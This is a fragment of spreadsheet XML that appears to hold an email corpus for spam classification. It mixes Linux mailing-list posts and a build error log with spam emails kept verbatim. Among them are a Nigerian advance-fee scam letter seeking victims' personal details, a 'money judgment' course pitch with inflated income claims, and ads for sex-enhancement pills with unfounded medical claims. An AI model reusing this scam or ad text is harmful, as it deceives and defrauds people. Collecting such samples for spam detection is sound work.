 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Le 3 Septembre 2002 12:43, vous avez crit :
 &gt; Yannick,
 &gt; You'll want to peruse Fravia's web site on reverse engineering (and other
 &gt; things) http://www.woodmann.com/fravia/protec.htm. That specific page
 &gt; covers just your concerns.
 &gt;
 &gt; Josh
 Thanks for the input.  Some of the tips are quite portable but are there any 
 special attentions to take when implementing such shemes on a UNIX system ?
 Thanks.
 - -- 
 Yannick Gingras
 Coder for OBB : Ostentatiously Breathless Brother-in-law
 http://OpenBeatBox.org
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9dQ6guv7G0DNFO+QRApsXAKCjD98foVvLjet3x9ExtihruvT7KACeNayD
 wDZlxJXjDmLFhNrN97cd73M=
 =4Clx
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: INVITATION TO TREAT
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM THE DESK OF:DR.OLUFEMI COKER,
 ECONOMIC RECOVERY COMMITTEE,
 FEDERAL SECRETARIAT, 
 LAGOS-NIGERIA.
 FOR YOUR KIND ATTENTION,
 BUSINESS PROPOSAL: TRANSFER OF US$ 22.5 M (TWENTY TWO
 MILLION, FIVE HUNDRED THOUSAND UNITED STATES DOLLARS)
 &amp; BUSINESS INVESTMENTS PARTNERSHIP.
 First, I must solicit your strictest confidence in
 this transaction, this is by  virtue of it's nature as
 being utterly confidential and top secret as you were
 introduced to us in confidence through the Nigerian
 Chamber of Commerce, foreign trade division.
  I am the chairman of the Economic Recovery Committe
 (ERC) set up by the present civilian Government of
 Nigeria to review contracts awarded  by the past
 military administration.
 In the course of our work at the ERC, we discovered
 this fund which resulted from gross re-valuation of
 contracts  by top government officials of  the last
 administration. The companies that executed the
 contracts have been duly paid and the contracts
 commissioned leaving the sum of US$22.5 Million
 floating in the escrow account of the Central Bank of
 Nigeria  ready for payment.
 I have therefore been mandated as a matter of trust by
 my colleagues in the committee to look for an overseas
 partner to whom we could transfer the sum of US$22.5M
 legally subcontracting the entitlement to you/your
 company. This is bearing in mind that our  civil
 service code of conduct forbids us from owning 
 foreign company or running  foreign account while in
 government service hence the need for an overseas
 partner.
 We have agreed that the funds will be shared thus
 after it has been paid into your account:
 (1) 25% of the money will go to you for acting as the
 beneficiary of the fund.
 (2) 5% has been set aside as an abstract projection
 for reimbursment to both parties for incidental
 expences that may be incurred in the course of the
 transaction.
 (3) 70% to us the government officials (with  which we
 wish to commence an importation business in
 conjunction with you ). 
 All logistics are in place and all modalities worked
 out for the smooth conclusion of the transaction 
 within ten to fourteen days of commencement after
 receipt of the following information:  Your  full
 name/ company name, address, company's details &amp;
 activities, telephone &amp; fax numbers.
 These information will enable us make the applications
 and lodge claims to the concerned ministries &amp;
 agencies in favour of your company and it is pertinent
 to state here that this transaction is entirely  based
 on trust as the solar bank draft or certified cheque
 drawable in any of the Central Bank of Nigeria
 correspondent bankers in America, Asia and Europe is
 going to be made in your name.Please acknowledge the
 receipt of this letter  using my personal E-mail
 address.
 Yours Faithfully, 
 DR.OLUFEMI COKER.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY bgColor=3D#C0C0C0&gt;
 &lt;FONT face=3D"Arial"&gt;
 &lt;FONT size=3D4&gt;
 &lt;FONT color=3D"#800040"&gt; Thank you for your interest!&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#800040"&gt;  &lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;                         &lt;BR&gt;
 &lt;BR&gt;
 Judgment Courses offers an extensive Audio training&lt;BR&gt;
 course in &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; "How to Collect Money Judgments"&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  .         &lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#000000"&gt; S6&lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;BR&gt;
 If you are like many people, you are not even sure what a&lt;BR&gt;
 Money Judgment is and &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; why processing Money Judgments&lt;BR&gt;
 can earn you very substantial income&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  .&lt;BR&gt;
 &lt;BR&gt;
 If you ever sue a company or a person and you win then you&lt;BR&gt;
 will have a Money Judgment against them.&lt;BR&gt;
 &lt;BR&gt;
 You are happy you won but you will soon find out the&lt;BR&gt;
 shocking fact: "Its now up to you to collect on the&lt;BR&gt;
 Judgment". The court does not require the loser to pay you.&lt;BR&gt;
 The court will not even help you. You must trace the loser&lt;BR&gt;
 down, find their assets, their employment, bank accounts,&lt;BR&gt;
 real estate, stocks and bonds, etc.&lt;BR&gt;
 &lt;BR&gt;
 Very few people know how to find these assets or what to do&lt;BR&gt;
 when they are found. The result is that millions of&lt;BR&gt;
 Judgments are just sitting in files and being forgotten.&lt;BR&gt;
 &lt;BR&gt;
 "In 79% of the cases the winner of a Judgment never sees a&lt;BR&gt;
 dime."&lt;BR&gt;
 &lt;BR&gt;
 The non-payment of judicial debt has grown to epidemic&lt;BR&gt;
 proportions. Right now in the United States there is&lt;BR&gt;
 between &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; 200 and 300 billion dollars of uncollected Money&lt;=
 BR&gt;
 Judgment debt&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  . For every Judgment that is paid, 5 more&lt;BR&gt;
 Judgments take its place.&lt;BR&gt;
 &lt;BR&gt;
 We identified this massive market 8 years ago and have&lt;BR&gt;
 actively pursued Judicial Judgments since. We invented this&lt;BR&gt;
 business. We have perfected it into a well proven and solid&lt;BR&gt;
 profession in which only a select few will be trained in the&lt;BR&gt;
 techniques necessary to succeed.&lt;BR&gt;
 &lt;BR&gt;
 With our first hand experience we have built a course which&lt;BR&gt;
 teaches you how to start your business in this new unknown&lt;BR&gt;
 and exciting field of processing Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 By following the steps laid out in our course and with&lt;BR&gt;
 reasonable effort you can become very successful in the&lt;BR&gt;
 processing of Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 The income potential is substantial in this profession. &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; We&lt;BR&gt;
 have associates who have taken our course and are now&lt;BR&gt;
 working full time making $96,000.00 to over $200,000.00 per&lt;BR&gt;
 year. Part time associates are earning between $24,000.00&lt;BR&gt;
 and $100,000.00 per year &lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt; . Some choose to operate out of&lt;BR&gt;
 their home and work by themselves. Others build a sizable&lt;BR&gt;
 organization of 15 to 25 people in attractive business&lt;BR&gt;
 offices.&lt;BR&gt;
 &lt;BR&gt;
 Today our company and our associates have over 126&lt;BR&gt;
 million dollars in Money Judgments that we are currently&lt;BR&gt;
 processing. Of this 126 million, 25 million is in the form&lt;BR&gt;
 of joint ventures between our firm and our associates.&lt;BR&gt;
 Joint ventures are where we make our money. We only break&lt;BR&gt;
 even when our course is purchased. We make a 12% margin on&lt;BR&gt;
 the reports we supply to our associates. Our reporting&lt;BR&gt;
 capability is so extensive that government agencies, police&lt;BR&gt;
 officers, attorneys, credit agencies etc., all come to us&lt;BR&gt;
 for reports.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 Many of our associates already have real estate liens in&lt;BR&gt;
 force of between 5 million to over 15 million dollars.&lt;BR&gt;
 Legally this means that when the properties are sold or&lt;BR&gt;
 refinanced our associate must be paid off. The norm is 10%&lt;BR&gt;
 interest compounded annually on unpaid Money Judgments.&lt;BR&gt;
 Annual interest on 5 million at 10% translates to&lt;BR&gt;
 $500,000.00 annually in interest income, not counting the&lt;BR&gt;
 payment of the principal.&lt;BR&gt;
 &lt;BR&gt;
 Our associates earn half of this amount or $250,000.00 per&lt;BR&gt;
 year. This is just for interest, not counting principle&lt;BR&gt;
 and not counting the compounding of the interest which can&lt;BR&gt;
 add substantial additional income. Typically companies are&lt;BR&gt;
 sold for 10 times earnings. Just based on simple interest&lt;BR&gt;
 an associate with 5 million in real estate liens could sell&lt;BR&gt;
 their business for approximately 2.5 million dollars.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; 92% of all of our associates work out of their ho=
 me; 43%&lt;BR&gt;
 are women and 36% are part time&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  .&lt;BR&gt;
 &lt;BR&gt;
 One of the benefits of working in this field is that you are&lt;BR&gt;
 not under any kind of time frame. If you decide to take off&lt;BR&gt;
 for a month on vacation then go. The Judgments you are&lt;BR&gt;
 working on will be there when you return. The Judgments&lt;BR&gt;
 are still in force, they do not disappear.&lt;BR&gt;
 &lt;BR&gt;
 The way we train you is non-confrontational. You use your&lt;BR&gt;
 computer and telephone to do most of the processing. You&lt;BR&gt;
 never confront the debtor. The debtor doesn't know who you&lt;BR&gt;
 are. You are not a collection agency.&lt;BR&gt;
 &lt;BR&gt;
 Simply stated the steps to successful Money Processing&lt;BR&gt;
 are as follows:&lt;BR&gt;
 &lt;BR&gt;
 Mail our recommended letter to companies and individuals&lt;BR&gt;
 with Money Judgments. (We train you how to find out who&lt;BR&gt;
 to write to)&lt;BR&gt;
 &lt;BR&gt;
 8% to 11% of the firms and people you write will call you&lt;BR&gt;
 and ask for your help. They call you, you don't call them&lt;BR&gt;
 unless you want to.&lt;BR&gt;
 &lt;BR&gt;
 You send them an agreement (supplied in the course) to&lt;BR&gt;
 sign which splits every dollar you collect 50% to you and&lt;BR&gt;
 50% to them. This applies no matter if the judgment is for&lt;BR&gt;
 $2,000.00 or $2,000,000.00.&lt;BR&gt;
 &lt;BR&gt;
 You then go on-line to our computers to find the debtor&lt;BR&gt;
 and their assets. We offer over 120 powerful reports to&lt;BR&gt;
 assist you. They range from credit reports from all three&lt;BR&gt;
 credit bureaus, to bank account locates, employment&lt;BR&gt;
 locates, skip traces and locating stocks and bonds, etc.&lt;BR&gt;
 The prices of our reports are very low. Typically 1/2 to&lt;BR&gt;
 1/3 of what other firms charge. For example we charge&lt;BR&gt;
 $6.00 for an individuals credit report when some other&lt;BR&gt;
 companies charge $25.00.&lt;BR&gt;
 &lt;BR&gt;
 Once you find the debtor and their assets you file&lt;BR&gt;
 garnishments and liens on the assets you have located.&lt;BR&gt;
 (Standard fill in the blanks forms are included in the&lt;BR&gt;
 course)&lt;BR&gt;
 &lt;BR&gt;
 When you receive the assets you keep 50% and send 50% to&lt;BR&gt;
 the original Judgment holder.&lt;BR&gt;
 &lt;BR&gt;
 Once the Judgment is fully paid you mail a Satisfaction of&lt;BR&gt;
 Judgment to the court. (Included in the course)&lt;BR&gt;
 &lt;BR&gt;
 Quote's from several of our students:&lt;BR&gt;
 &lt;BR&gt;
 Thomas in area code 516 writes us: "I just wanted to drop&lt;BR&gt;
 you a short note thanking you for your excellent course. &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; My&lt;BR&gt;
 first week, part time, will net me 3,700.00 dollars&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  . Your&lt;BR&gt;
 professionalism in both the manual and the video opened&lt;BR&gt;
 doors for me in the future. There's no stopping me now.&lt;BR&gt;
 Recently Thomas states he has over $8,500,000 worth of&lt;BR&gt;
 judgments he is working on.&lt;BR&gt;
 &lt;BR&gt;
 After only having this course for four months, Larry S. in&lt;BR&gt;
 area code 314 stated to us: " &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; I am now making $2,000.00 per&lt;BR&gt;
 week &lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt; and expect this to grow to twice this amount with=
 in the&lt;BR&gt;
 next year. I am having a ball. I have over $250,000 in&lt;BR&gt;
 judgments I am collecting on now."&lt;BR&gt;
 &lt;BR&gt;
 After having our course for 7 months Larry S. in 314 stated&lt;BR&gt;
 " &lt;/FONT&gt;
 &lt;FONT color=3D"#0000A0"&gt; I am now making $12,000.00&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  per month and have approximately&lt;BR&gt;
 $500,000.00 in judgments I am collecting on. Looks like I&lt;BR&gt;
 will have to hire someone to help out"&lt;BR&gt;
 &lt;BR&gt;
 Marshal in area code 407 states to us "I feel bad, you only&lt;BR&gt;
 charged me $259.00 for this course and it is a goldmine. I&lt;BR&gt;
 have added 3 full time people to help me after only having&lt;BR&gt;
 your course for 5 months"&lt;BR&gt;
 &lt;BR&gt;
 &gt;From the above information and actual results you can see&lt;BR&gt;
 why we can state the following:&lt;BR&gt;
 &lt;BR&gt;
 With our course you can own your own successful business.&lt;BR&gt;
 A business which earns you substantial income now and one&lt;BR&gt;
 which could be sold in 3-5 years, paying you enough to&lt;BR&gt;
 retire on and travel the world. A business which is&lt;BR&gt;
 extremely interesting to be in. A Business in which every&lt;BR&gt;
 day is new and exciting.&lt;BR&gt;
 &lt;BR&gt;
 None of your days will be hum-drum. Your brain is&lt;BR&gt;
 Challenged. A business, which protects you from Corporate&lt;BR&gt;
 Downsizing. A business which you can start part time from&lt;BR&gt;
 your home and later, if you so desire, you can work in full&lt;BR&gt;
 time. A business, which is your ticket to freedom from&lt;BR&gt;
 others telling you what to do. A business, which lets you&lt;BR&gt;
 control your own destiny. Our training has made this happen&lt;BR&gt;
 for many others already. Make it happen for you!&lt;BR&gt;
 &lt;BR&gt;
 If the above sounds interesting to you then its time for you&lt;BR&gt;
 to talk to a real live human being, no cost or obligation&lt;BR&gt;
 on your part.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT color=3D"#800040"&gt; Please call us at 1_406_652_0194 &lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt; .&lt;BR&gt;
 &lt;BR&gt;
 We have &lt;/FONT&gt;
 &lt;FONT color=3D"#800040"&gt; Customer Support staff available to you from 8:00=
 am to&lt;BR&gt;
 9:00pm (Mountain Time) 7 days a week&lt;/FONT&gt;
 &lt;FONT color=3D"#000000"&gt;  . If you call this number&lt;BR&gt;
 you can talk to one of our experienced Customer Support personnel.&lt;BR&gt;
 They can answer any questions you may have - with no obligation.&lt;BR&gt;
 Sometimes we run special pricing on our courses and combinations&lt;BR&gt;
 of courses. When you call our Customer Support line they can let&lt;BR&gt;
 you know of any specials we may be running. If you like what you&lt;BR&gt;
 read and hear about our courses, then the Customer Support person&lt;BR&gt;
 can work with you to place your order. We are very low key. We&lt;BR&gt;
 merely give you the facts and you can then decide if you want to&lt;BR&gt;
 work with us or not.&lt;BR&gt;
 &lt;BR&gt;
 Thank you for your time and interest.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT face=3D"Courier New"&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#000000"&gt; .................................................=
 ....................&lt;BR&gt;
 T h i s message i s produced a n d sent out by:&lt;BR&gt;
 Universal S.y.s.t.e.m.s.&lt;BR&gt;
 To be dropped form our mailing list please email us at &lt;BR&gt;
 james77@mail.asia-links.com call us toll free at 1=3D888=3D605=3D2485&lt;BR&gt;
 and  g i v e us y o u r email a d d r e s s  or w r i t e  us a t:&lt;BR&gt;
 *Central*DB*Processing, PO: Box:1200, O r a n j e s t a d, Aruba&lt;BR&gt;
 .....................................................................&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT face=3D"Arial"&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT size=3D2&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''=
 '''''''''''&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;FONT size=3D3&gt;
 &lt;FONT color=3D"#000000"&gt; &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FO=
 NT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW:&gt; Men &amp; Women, Add a little spice to your life! FEHK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</si>
  <si>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&lt;title&gt;Vigoral Ad&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"54%" height=3D"393"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"387"&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"98%" height=3D"79" bgcolor=3D"#FFFF99"&gt;
     &lt;tr&gt;
       &lt;th width=3D"71%" height=3D"73" align=3D"center"&gt;&lt;font size=3D"3" co=
 lor=3D"#FF0000"&gt;&lt;b&gt;Vigoral Herbal Sex Enhancers&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;b&gt;&lt;font fac=
 e=3D"Times New Roman" color=3D"#FF0000" size=3D"3"&gt;Direct from
         the lab to you!&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" =
 color=3D"#0066FF"&gt;We
         are Now Offering 3 Unique Products to help increase your moments w=
 ith
         that special someone @ &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" col=
 or=3D"#FF0000"&gt;Only
         $24.99 each!!!&lt;/font&gt;&lt;/b&gt;&lt;/th&gt;
       &lt;th width=3D"29%" height=3D"73" align=3D"center"&gt;&lt;a href=3D"http://w=
 ww.medievalmedia.com/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025=
 /freeshipping1.gif" width=3D"160" height=3D"80"&gt;&lt;/a&gt;&lt;/th&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" width=3D"59%" height=3D"351"&gt;
     &lt;tr&gt;
       &lt;td width=3D"88%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPER.jpg" width=3D"138" height=3D=
 "72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"80%" height=3D"88" align=3D"center" bordercolor=3D"#FFF=
 F99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" border=
 colordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img borde=
 r=3D"0" src=3D"http://www.polwas.com/0025/SUPERb.jpg" width=3D"139" height=
 =3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"88" align=3D"center" bordercolor=3D"#FF=
 FF99" style=3D"border: 1 solid #FFFF99" bordercolorlight=3D"#FFFF99" borde=
 rcolordark=3D"#FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.com/"&gt;&lt;img bord=
 er=3D"0" src=3D"http://www.polwas.com/0025/SUPERv.jpg" width=3D"163" heigh=
 t=3D"72"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/supervigoral.jpg"=
  width=3D"91" height=3D"158"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" co=
 lor=3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorgel.jpg" wid=
 th=3D"90" height=3D"160"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=3D=
 "#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"170" align=3D"center" bgcolor=3D"#FFFF9=
 9" style=3D"border: 1 solid #FFFF99"&gt;&lt;a href=3D"http://www.medievalmedia.c=
 om/"&gt;&lt;img border=3D"0" src=3D"http://www.polwas.com/0025/vigorette.jpg" wi=
 dth=3D"98" height=3D"159"&gt;&lt;/a&gt;&lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"2" color=
 =3D"#0066FF"&gt;Only
         $24.99 ea!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"116%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;M=
 en,
         Increase Your Energy Level &amp;amp; Maintain Stronger Erections!&lt;/td&gt;
       &lt;td width=3D"125%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;E=
 dible,
         Specially Formulated Lubricant For Everyone!&lt;/td&gt;
       &lt;td width=3D"191%" height=3D"87" style=3D"color: #FF0000; font-famil=
 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;W=
 omen,
         Heighten Your Sexual Desire &amp;amp; Increase Your Sexual Climax!&lt;/td=
 &gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
         &lt;div align=3D"center"&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"44" bgcolor=3D"#FF00=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"38" align=3D"center" bordercolo=
 r=3D"#FFFF99" style=3D"border: 1 solid #FFFF99"&gt;&lt;b&gt;&lt;font color=3D"#FFFF99"=
  size=3D"5" face=3D"Tahoma"&gt;&lt;a href=3D"http://www.medievalmedia.com/" styl=
 e=3D"color: #FFFF99; font-size: 14pt; font-weight: bold"&gt;CLICK
                 HERE to Get it While it's HOT!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"54%" height=3D"99"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"93" align=3D"center"&gt;&lt;font face=3D"Verd=
 ana" color=3D"#000000" size=3D"1"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a style=3D"COLOR: #ff0000" h=
 ref=3D"mailto:print5@btamail.net.cn?Subject=3DUNSUBSCRIBE"&gt;Click
         HERE&lt;/a&gt; and you will be removed within less than three business d=
 ays.
         Thank You and sorry for any inconvenience.&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Real Doctors, Real Science, Real ResultsIPZC
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;b&gt;&lt;FONT SIZE=3D4&gt;In a recent survey conducted by =
 &lt;FONT COLOR=3D#0033FF&gt;&lt;B&gt;Durex&lt;/B&gt;
 &lt;/FONT&gt;condoms, &lt;FONT COLOR=3D#FF0033&gt;6=
 7%
 &lt;/FONT&gt;of women said that&lt;br&gt;they are unhappy with the size of their lo=
 vers. Proof that &lt;FONT COLOR=3D#FF0033&gt;size does&lt;br&gt;matter&lt;/FONT&gt;! A large=
  penis has much more surface area and is capable of&lt;br&gt;stimulating more ne=
 rve endings, providing more pleasure for you and your&lt;br&gt;partner. Our revo=
 lutionary pill developed by world famous pharmacist is&lt;br&gt;guaranteed to in=
 crease your size by 1-3".&lt;BR&gt;&lt;A HREF=3Dhttp://affiliate.vpgate.com/affilia=
 tewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DClick&gt;Enter here for details=
 &lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;b&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;=
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D1 COLOR=3D#FFFFCC&gt;To come off just &lt;A HRE=
 F=3Dhttp://www.vpgate.com/remove&gt;Open here&lt;/A&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">checking build system type... i686-pc-linux-gnu
 checking host system type... i686-pc-linux-gnu
 checking target system type... Invalid configuration
 `athalon-redhat-linux': machine `athalon-redhat' not recognized
 configure: error: /bin/sh admin/config.sub athalon-redhat-linux failed
 error: Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673
 (%prep)
 RPM build errors:
     user jkeating does not exist - using root
     group jkeating does not exist - using root
     user jkeating does not exist - using root
     group jkeating does not exist - using root
     Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673 (%prep)
 [dale@gandalf dale]$
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $50,000 Giveaway!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_436A1_01C22E78.6D2241B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Ann Arbor Annuity Exchange $50,000 Giveaway!	
  When You Think Annuities...Think Ann Arbor	
 Just a short list of the many companies we represent 	
 Fill out this form for a FREE entry in our $50,000 Giveaway!	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 Fax:	  	
 City:	  	State:	  	 	
 Agent Use Only. Employees and family members of Ann Arbor Annuity
 Exchange and the 
 subsidiaries are ineligible.
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_436A1_01C22E78.6D2241B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;$50,000 Giveaway!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#000066" align=3D"center"&gt;
     &lt;tr&gt;
